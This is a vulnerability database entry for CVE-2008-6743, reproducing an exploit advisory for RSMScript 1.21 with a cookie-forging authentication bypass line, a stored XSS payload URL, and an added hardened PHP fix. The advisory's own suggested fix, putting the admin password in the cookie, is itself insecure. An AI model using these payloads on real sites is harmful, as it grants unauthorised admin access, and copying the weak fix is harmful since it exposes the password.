Shock-Therapy RSMScript cookie authentication bypass and HTML injection vulnerability in multiple scripts

Vulnerability ID: 1117075    Vulnerability type: Authorization issue
Published: 2008-12-17    Updated: 2009-04-23
CVE: CVE-2008-6743    CNNVD-ID: CNNVD-200904-412
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7497
https://cxsecurity.com/issue/WLB-2009040222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-412
|Vulnerability details
RSMScript 1.21 allows remote attackers to bypass authentication and gain administrative privileges by setting the verified cookie to an arbitrary value and sending a direct request to (1) delete.php, (2) edit-submit.php, (3) edit.php, (4) submit.php or (5) update.php, which bypasses the security check performed by verify.php.
|Vulnerability EXP
[START]

#########################################################################################
[0x01] Informations:

Script         : RSMScript 1.21
Download       : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1
Vulnerability  : Insecure Cookie Handling / XSS
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX

#########################################################################################
[0x02] Bug: [Insecure Cookie Handling]
######

Bugged file is: /[path]/verify.php

[CODE]

if($admin_pass == $code)
{
  setcookie("verified", "null", time()+1800);
  header( 'refresh: 0; url=update.php' );
}

[/CODE]

As we can see, if the password "$code" typed is the same as $admin_pass, you log in and a
cookie is set with the name "verified" and the content "null". So, a malicious user
can just set up a cookie with that name and value, and then he will be logged in as the
admin.

[!] FIX: A fix could be to use the password as the cookie content or name. Example:

[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE]


[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/";

#########################################################################################
[0x03] Bug: [XSS]
######

To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;)
There are two bugged files.

1) /[path]/submit.php
   In this file, we can put arbitrary data into a .txt file.

   [CODE]

    $quote = $_REQUEST['quote'];
    $writePage = fopen('quotes.txt', 'a') or die("can't open file");
    fwrite($writePage, "\t");
    fwrite($writePage, stripslashes($quote));
    fclose($writePage);

   [/CODE]

   [!] FIX: Just filter direct user input.


2) /[path]/update.php
   This file gets the quotes.txt content and prints it directly into the HTML code.
   In 1) we saw that we can put arbitrary data into this .txt file. Just
   put JS code ;)

   [CODE]

    $quotes = file_get_contents("quotes.txt");
    $quotes= preg_split("/[\t]+/", $quotes);
    $i = 0;
    $noQuotes = sizeOf($quotes);
    while ($i < $noQuotes)
    {
        $quote = $quotes[$i];
        echo '<option value='.$i.'>'.$quote.'</option>';
        $i = $i + 1;
    }

   [/CODE]

   [!] FIX: A fix could be just to filter input before being printed in html code.


## How to exploit these bugs?

[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script>

#########################################################################################
[/END]

# milw0rm.com [2008-12-17]
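The two fixes sketched in the advisory, written out as an added PHP example (not RSMScript's own code): instead of the advisory's suggestion of putting the password into the cookie, the login state is kept in a server-side session behind an HttpOnly cookie, and the update.php loop output-encodes each quote. The names $admin_hash, login_admin, is_admin_session and render_quote_options are assumptions of this example.

```php
<?php
// Added example, not RSMScript's own code: a hardened replacement for the
// verify.php login and the update.php rendering loop from the advisory.
// Assumptions: $admin_hash holds a password_hash() of the admin password and
// quotes.txt keeps the original tab-separated layout.

// Session cookie is HttpOnly (not readable via document.cookie) and Secure.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
session_start();

// Check the password against a stored hash and record the login server-side,
// so a client-chosen cookie value such as "verified=null" cannot grant admin.
function login_admin(string $code, string $admin_hash): bool
{
    if (!password_verify($code, $admin_hash)) {
        return false;
    }
    session_regenerate_id(true);   // fresh session id after login
    $_SESSION['is_admin'] = true;
    $_SESSION['login_at'] = time();
    return true;
}

// Every protected script (delete.php, edit.php, submit.php, update.php, ...)
// calls this instead of testing for the presence of a "verified" cookie.
function is_admin_session(): bool
{
    $fresh = isset($_SESSION['login_at']) && (time() - $_SESSION['login_at']) < 1800;
    return !empty($_SESSION['is_admin']) && $fresh;
}

// Output-encode each quote so a stored "<script>" tag is rendered as literal
// text instead of being executed (the update.php fix).
function render_quote_options(string $raw): string
{
    $out = '';
    foreach (preg_split("/[\t]+/", $raw, -1, PREG_SPLIT_NO_EMPTY) as $i => $quote) {
        $safe = htmlspecialchars($quote, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $out .= '<option value="' . $i . '">' . $safe . '</option>';
    }
    return $out;
}

if (!is_admin_session()) {        // update.php: refuse unless logged in
    http_response_code(403);
    exit('Not authorized');
}
// Constructed sample standing in for quotes.txt; the second entry is hostile.
echo render_quote_options("\tfirst quote\t<script>alert(1)</script>");
```

login_admin() is what verify.php would call on form submission; the other scripts only need the is_admin_session() guard.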
|References

Source: XF    Name: rsmscript-verify-security-bypass(47451)    Link: http://xforce.iss.net/xforce/xfdb/47451
Source: BID    Name: 32886    Link: http://www.securityfocus.com/bid/32886
Source: MILW0RM    Name: 7497    Link: http://www.milw0rm.com/exploits/7497
Source: SECUNIA    Name: 33150    Link: http://secunia.com/advisories/33150
Source: OSVDB    Name: 50802    Link: http://osvdb.org/50802